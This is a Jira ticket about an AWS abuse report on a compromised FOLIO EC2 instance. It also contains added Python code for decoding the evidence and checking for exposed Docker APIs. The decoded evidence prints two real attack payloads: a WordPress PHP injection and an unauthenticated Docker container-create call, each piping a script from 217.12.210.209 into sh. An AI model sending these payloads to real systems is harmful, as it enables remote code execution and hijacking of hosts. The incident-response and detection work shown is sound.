[FOLIO-2642] carrier-io-restored AWS security incident: wordpress_php_rce, docker_unauth_rce Created: 11/Jun/20  Updated: 17/Jun/20  Resolved: 17/Jun/20

Status: Closed
Project: FOLIO
Components: None
Affects versions: None
Fix versions: None

Type: Task Priority: P1
Reporter: Peter Murray Assignee: John Malconian
Resolution: Done Votes: 0
Labels: security
Remaining Estimate: Not Specified
Time Spent: Not Specified
Original estimate: Not Specified

Sprint: DevOps: sprint 90
Development Team: FOLIO DevOps

 Description   

Hello,

We've received a report(s) that your AWS resource(s)

AWS ID: 732722833398 Region: us-east-1 EC2 Instance Id: i-0b5799b100760ae41 [3.93.19.104]

has been implicated in activity which resembles attempts to access remote hosts on the internet without authorization. Activity of this nature is forbidden in the AWS Acceptable Use Policy (https://aws.amazon.com/aup/). We've included the original report below for your review.

Please take action to stop the reported activity and reply directly to this email with details of the corrective actions you have taken. If you do not consider the activity described in these reports to be abusive, please reply to this email with details of your use case.

If you're unaware of this activity, it's possible that your environment has been compromised by an external attacker, or a vulnerability is allowing your machine to be used in a way that it was not intended.

We are unable to assist you with troubleshooting or technical inquiries. However, for guidance on securing your instance, we recommend reviewing the following resources:

If you require further assistance with this matter, you can take advantage of our developer forums:

https://forums.aws.amazon.com/index.jspa

Or, if you are subscribed to a Premium Support package, you may reach out for one-on-one assistance here:

https://console.aws.amazon.com/support/home#/case/create?issueType=technical

Please remember that you are responsible for ensuring that your instances and all applications are properly secured. If you require any further information to assist you in identifying or rectifying this issue, please let us know in a direct reply to this message.

Regards,
AWS Trust & Safety
Amazon Web Services, LLC

Case Number: 10688485529-1

Comments:
<<<
This is to inform you that the destination IP addresses listed in attached evidence logs have received unexpected network traffic with potentially harmful payloads from an EC2 instance with IP address of 3.93.19.104 (ec2-3-93-19-104.compute-1.amazonaws.com) during the timeframe 2020-06-10 17:54:43 GMT to 2020-06-10 18:39:40 GMT.

You may find attached the logs from destinations which received the unexpected network traffic. Please note that the payload field in attached evidence logs is base64 encoded and the content must be handled with security precautions required to analyze potentially harmful malware.
>>>

{
  "traffic_start": "2020-06-10 17:54:43 GMT",
  "traffic_end": "2020-06-10 18:39:40 GMT",
  "source_ip": "3.93.19.104",
  "source_rdns": "ec2-3-93-19-104.compute-1.amazonaws.com",
  "destination_ips": [
    "15.185.200.0",
    "13.208.183.251"
  ],
  "destination_ports": [
    "80/tcp",
    "2375/tcp"
  ],
  "payload_classes": [
    "exploit:gen/docker_unauth_rce",
    "exploit:gen/wordpress_php_rce"
  ],
  "traffic_logs": [
    {
      "timestamp": 1591814380,
      "source_ip": "3.93.19.104",
      "source_domain": "ec2-3-93-19-104.compute-1.amazonaws.com",
      "destination_ip": "15.185.200.0",
      "destination_port": 80,
      "destination_service": "http",
      "protocol": "tcp",
      "payload_class": "exploit:gen/wordpress_php_rce",
      "payload_data": "R0VUIC8/YT1mZXRjaCZjb250ZW50PTxwaHA+ZGllKHNoZWxsX2V4ZWMoImN1cmwlMjAyMTcuMTIuMjEwLjIwOS90Zi5zaHxzaCIpKTwvcGhwPiBIVFRQLzEuMQ0KaG9zdDogMTUuMTg1LjIwMC4wOjgwDQp1c2VyLWFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBXaW42NDsgeDY0KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvNzguMC4zOTA0LjEwOCBTYWZhcmkvNTM3LjM2DQpjb25uZWN0aW9uOiBjbG9zZQ0KYWNjZXB0LWVuY29kaW5nOiBnemlwDQoNCg=="
    },
    {
      "timestamp": 1591811683,
      "source_ip": "3.93.19.104",
      "source_domain": "ec2-3-93-19-104.compute-1.amazonaws.com",
      "destination_ip": "13.208.183.251",
      "destination_port": 2375,
      "destination_service": "docker",
      "protocol": "tcp",
      "payload_class": "exploit:gen/docker_unauth_rce",
      "payload_data": "UE9TVCAvdjEuMjQvY29udGFpbmVycy9jcmVhdGUgSFRUUC8xLjENCmhvc3Q6IDEzLjIwOC4xODMuMjUxOjIzNzUNCnVzZXItYWdlbnQ6IEdvLWh0dHAtY2xpZW50LzEuMQ0KY29udGVudC1sZW5ndGg6IDQ2MA0KY29udGVudC10eXBlOiBhcHBsaWNhdGlvbi9qc29uDQphY2NlcHQtZW5jb2Rpbmc6IGd6aXANCg0KeyJIb3N0bmFtZSI6IiIsIkRvbWFpbm5hbWUiOiIiLCJVc2VyIjoiIiwiQXR0YWNoU3RkaW4iOmZhbHNlLCJBdHRhY2hTdGRvdXQiOmZhbHNlLCJBdHRhY2hTdGRlcnIiOmZhbHNlLCJUdHkiOmZhbHNlLCJPcGVuU3RkaW4iOmZhbHNlLCJTdGRpbk9uY2UiOmZhbHNlLCJFbnYiOm51bGwsIkNtZCI6bnVsbCwiSW1hZ2UiOiJ1YnVudHUiLCJWb2x1bWVzIjpudWxsLCJXb3JraW5nRGlyIjoiIiwiRW50cnlwb2ludCI6WyIvYmluL2Jhc2giLCItYyIsImFwdC1nZXQgdXBkYXRlIFx1MDAyNlx1MDAyNiBhcHQtZ2V0IGluc3RhbGwgLXkgd2dldCBjcm9uO3NlcnZpY2UgY3JvbiBzdGFydDsgd2dldCAtcSAtTyAtIDIxNy4xMi4yMTAuMjA5L2Quc2ggfCBzaDt0YWlsIC1mIC9kZXYvbnVsbCJdLCJPbkJ1aWxkIjpudWxsLCJMYWJlbHMiOm51bGwsIkhvc3RDb25maWciOm51bGwsIk5ldHdvcmtpbmdDb25maWciOm51bGx9Cg=="
    }
  ]
}
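The decoding of the two payload_data fields, done programmatically as an added example for this ticket (it is not part of the AWS report and not FOLIO DevOps tooling): each record is base64-decoded, the raw HTTP request is split into request line, headers and body, the attacker-controlled command is pulled out of either the container spec (Docker Engine API) or the query string (web probe), and the stager URLs are collected as indicators to block or hunt for in flow logs. The two evidence records are copied from the JSON above; the field names are the ones the report itself uses. The IOC regex is this example's own and only covers the bare-IPv4 URLs seen here.

```python
"""Decode the AWS abuse-report evidence and pull out indicators.

Added example for this ticket, not part of the original report. The two
payload_data strings are copied from the evidence JSON in the ticket; the
parsing and IOC rules below are this example's own.
"""
import base64
import json
import re
from urllib.parse import parse_qs, urlsplit

EVIDENCE = {
    "traffic_logs": [
        {
            "destination_ip": "15.185.200.0", "destination_port": 80,
            "payload_class": "exploit:gen/wordpress_php_rce",
            "payload_data": "R0VUIC8/YT1mZXRjaCZjb250ZW50PTxwaHA+ZGllKHNoZWxsX2V4ZWMoImN1cmwlMjAyMTcuMTIuMjEwLjIwOS90Zi5zaHxzaCIpKTwvcGhwPiBIVFRQLzEuMQ0KaG9zdDogMTUuMTg1LjIwMC4wOjgwDQp1c2VyLWFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBXaW42NDsgeDY0KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvNzguMC4zOTA0LjEwOCBTYWZhcmkvNTM3LjM2DQpjb25uZWN0aW9uOiBjbG9zZQ0KYWNjZXB0LWVuY29kaW5nOiBnemlwDQoNCg==",
        },
        {
            "destination_ip": "13.208.183.251", "destination_port": 2375,
            "payload_class": "exploit:gen/docker_unauth_rce",
            "payload_data": "UE9TVCAvdjEuMjQvY29udGFpbmVycy9jcmVhdGUgSFRUUC8xLjENCmhvc3Q6IDEzLjIwOC4xODMuMjUxOjIzNzUNCnVzZXItYWdlbnQ6IEdvLWh0dHAtY2xpZW50LzEuMQ0KY29udGVudC1sZW5ndGg6IDQ2MA0KY29udGVudC10eXBlOiBhcHBsaWNhdGlvbi9qc29uDQphY2NlcHQtZW5jb2Rpbmc6IGd6aXANCg0KeyJIb3N0bmFtZSI6IiIsIkRvbWFpbm5hbWUiOiIiLCJVc2VyIjoiIiwiQXR0YWNoU3RkaW4iOmZhbHNlLCJBdHRhY2hTdGRvdXQiOmZhbHNlLCJBdHRhY2hTdGRlcnIiOmZhbHNlLCJUdHkiOmZhbHNlLCJPcGVuU3RkaW4iOmZhbHNlLCJTdGRpbk9uY2UiOmZhbHNlLCJFbnYiOm51bGwsIkNtZCI6bnVsbCwiSW1hZ2UiOiJ1YnVudHUiLCJWb2x1bWVzIjpudWxsLCJXb3JraW5nRGlyIjoiIiwiRW50cnlwb2ludCI6WyIvYmluL2Jhc2giLCItYyIsImFwdC1nZXQgdXBkYXRlIFx1MDAyNlx1MDAyNiBhcHQtZ2V0IGluc3RhbGwgLXkgd2dldCBjcm9uO3NlcnZpY2UgY3JvbiBzdGFydDsgd2dldCAtcSAtTyAtIDIxNy4xMi4yMTAuMjA5L2Quc2ggfCBzaDt0YWlsIC1mIC9kZXYvbnVsbCJdLCJPbkJ1aWxkIjpudWxsLCJMYWJlbHMiOm51bGwsIkhvc3RDb25maWciOm51bGwsIk5ldHdvcmtpbmdDb25maWciOm51bGx9Cg==",
        },
    ]
}

# Bare IPv4 host with an optional path, e.g. 217.12.210.209/tf.sh. Enough for
# the stager URLs in this report; deliberately not a general URL grammar.
IOC_RE = re.compile(r"(?:https?://)?(\d{1,3}(?:\.\d{1,3}){3})(/[^\s|;&'\")]*)?")


def parse_http_request(b64: str) -> dict:
    """Split a base64-encoded raw HTTP request into request line, headers, body."""
    raw = base64.b64decode(b64).decode("utf-8", errors="replace")
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, rest = request_line.split(" ", 1)
    target, version = rest.rsplit(" ", 1)      # the target itself is percent-encoded, no spaces
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version,
            "headers": headers, "body": body}


def extract_commands(req: dict) -> dict:
    """Pull the attacker-controlled command strings out of one request."""
    out = {"commands": [], "image": None, "host_config": None}
    if "/containers/create" in req["target"]:
        # Docker Engine API: the container spec is the JSON body.
        spec = json.loads(req["body"])
        out["image"] = spec.get("Image")
        out["host_config"] = spec.get("HostConfig")   # bind mounts / Privileged would live here
        for key in ("Entrypoint", "Cmd"):
            val = spec.get(key)
            if isinstance(val, list):
                out["commands"].append(" ".join(val))
            elif isinstance(val, str):
                out["commands"].append(val)
    else:
        # Web-application probe: the injected code rides in the query string.
        query = parse_qs(urlsplit(req["target"]).query)   # parse_qs percent-decodes values
        for values in query.values():
            out["commands"].extend(values)
    return out


def summarize(evidence: dict) -> list[dict]:
    """One summary row per traffic_logs entry, with the stager URLs as IOCs."""
    rows = []
    for entry in evidence["traffic_logs"]:
        req = parse_http_request(entry["payload_data"])
        cmds = extract_commands(req)
        iocs = {ip + path for cmd in cmds["commands"] for ip, path in IOC_RE.findall(cmd)}
        rows.append({
            "destination": f'{entry["destination_ip"]}:{entry["destination_port"]}',
            "payload_class": entry["payload_class"],
            "method": req["method"], "target": req["target"],
            "user_agent": req["headers"].get("user-agent"),
            **cmds, "iocs": sorted(iocs),
        })
    return rows


def all_iocs(evidence: dict) -> set[str]:
    """Every stager URL across the whole report, for blocklists and flow-log hunts."""
    return {ioc for row in summarize(evidence) for ioc in row["iocs"]}


if __name__ == "__main__":
    for row in summarize(EVIDENCE):
        print(json.dumps(row, indent=2))
    print("block / hunt for:", sorted(all_iocs(EVIDENCE)))
```

Two things worth noticing in the output: both payloads stage from the same host, 217.12.210.209 (tf.sh for the web probe, d.sh for the container), so that single address is the thing to search for in VPC flow logs for the whole window; and HostConfig is null in the captured create call, so this particular request does not bind the host filesystem or ask for Privileged, but the same API would accept such a spec just as readily, and the stager still gets the container's outbound network.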

wordpress_php_rce payload after base64 decoding:

GET /?a=fetch&content=<php>die(shell_exec("curl%20217.12.210.209/tf.sh|sh"))</php> HTTP/1.1
host: 15.185.200.0:80
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
connection: close
accept-encoding: gzip

docker_unauth_rce payload after base64 decoding:

POST /v1.24/containers/create HTTP/1.1
host: 13.208.183.251:2375
user-agent: Go-http-client/1.1
content-length: 460
content-type: application/json
accept-encoding: gzip

{"Hostname":"","Domainname":"","User":"","AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":null,"Cmd":null,"Image":"ubuntu","Volumes":null,"WorkingDir":"","Entrypoint":["/bin/bash","-c","apt-get update \u0026\u0026 apt-get install -y wget cron;service cron start; wget -q -O - 217.12.210.209/d.sh | sh;tail -f /dev/null"],"OnBuild":null,"Labels":null,"HostConfig":null,"NetworkingConfig":null}
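The container/create call above only does anything if the target's dockerd is listening on tcp/2375 with no TLS client authentication, which is the condition behind the docker_unauth_rce class. A read-only check for that condition on one's own hosts, as an added example (not FOLIO's code, and not something this ticket records was run): it sends GET /version over plaintext HTTP, which an open daemon answers with 200 and a JSON body carrying ApiVersion, while a daemon started with --tlsverify typically rejects a plaintext request with HTTP 400 and a closed port refuses the connection. The stub server is constructed here so the example runs offline; its version values are made up.

```python
"""Check whether a host exposes the Docker Engine API without TLS on tcp/2375.

Added example, not FOLIO DevOps tooling. Only the read-only GET /version
endpoint is used; nothing is created on the target.
"""
import http.client
import json
import socket
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer


def probe_docker_api(host: str, port: int = 2375, timeout: float = 3.0) -> dict:
    """Return {"exposed": bool, "reason": str, "version": dict | None} for host:port."""
    result = {"host": host, "port": port, "exposed": False, "reason": "", "version": None}
    try:
        conn = http.client.HTTPConnection(host, port, timeout=timeout)
        conn.request("GET", "/version", headers={"Host": f"{host}:{port}"})
        resp = conn.getresponse()
        body = resp.read()
        conn.close()
    except (OSError, http.client.HTTPException) as exc:
        # Connection refused, timeout, or a reply that is not HTTP at all.
        result["reason"] = f"no plaintext HTTP on {host}:{port} ({exc.__class__.__name__})"
        return result
    if resp.status != 200:
        # A TLS-only dockerd (--tlsverify) answers a plaintext request with 400.
        result["reason"] = f"HTTP {resp.status} from /version; API present but not open"
        return result
    try:
        info = json.loads(body)
    except ValueError:
        result["reason"] = "200 but body is not JSON; probably not dockerd"
        return result
    if isinstance(info, dict) and "ApiVersion" in info:
        result.update(exposed=True, version=info,
                      reason=f"unauthenticated Docker API {info['ApiVersion']} on {host}:{port}")
    else:
        result["reason"] = "JSON but no ApiVersion field; not dockerd"
    return result


class _FakeDockerd(BaseHTTPRequestHandler):
    """Stand-in for an open dockerd, constructed for this example only."""

    def do_GET(self):
        if self.path != "/version":
            self.send_error(404)
            return
        body = json.dumps({"ApiVersion": "1.40", "Version": "19.03.x", "Os": "linux"}).encode()
        self.send_response(200)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):   # keep the example quiet
        pass


def start_fake_dockerd() -> tuple:
    """Serve the stub on an ephemeral loopback port; returns (server, port)."""
    srv = HTTPServer(("127.0.0.1", 0), _FakeDockerd)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


def unused_port() -> int:
    """Pick a currently closed loopback TCP port for the negative case."""
    with socket.socket() as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


if __name__ == "__main__":
    srv, port = start_fake_dockerd()
    print(probe_docker_api("127.0.0.1", port))            # exposed: True
    print(probe_docker_api("127.0.0.1", unused_port()))   # exposed: False
    srv.shutdown()
```

Run it against the real fleet by calling probe_docker_api with each instance's address. The fix for a positive result is not a firewall rule alone: remove the -H tcp:// listener from dockerd so it serves only the unix socket, or keep the TCP listener behind --tlsverify with a CA the clients are issued certificates from, and in either case make sure no security group allows 2375 inbound from 0.0.0.0/0.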


 Comments   
Comment by Peter Murray [ 16/Jun/20 ]

John Malconian: Did you see the rather insistent follow-up email from AWS this morning? It seems like they want some kind of answer from us by email. Did you have a chance to clean up this server?

Comment by John Malconian [ 16/Jun/20 ]

Peter Murray The server is still running but traffic is not allowed in and out. I have an outstanding request from Martin to take a backup of the influx dbs before I completely shut it down. Haven't seen the email from AWS yet, but I'll respond.

Comment by John Malconian [ 16/Jun/20 ]

Sent response with our findings to AWS.

Comment by Peter Murray [ 16/Jun/20 ]

Thanks!

Comment by John Malconian [ 16/Jun/20 ]

I've taken influx db backups according to instructions from Martin and provided them to him via S3. The 'carrier-io-restored' has been terminated. I'm going to close this issue and follow up separately about a rebuild.

Generated at Thu Feb 08 23:22:10 UTC 2024 using Jira 1001.0.0-SNAPSHOT#100246-sha1:7a5c50119eb0633d306e14180817ddef5e80c75d.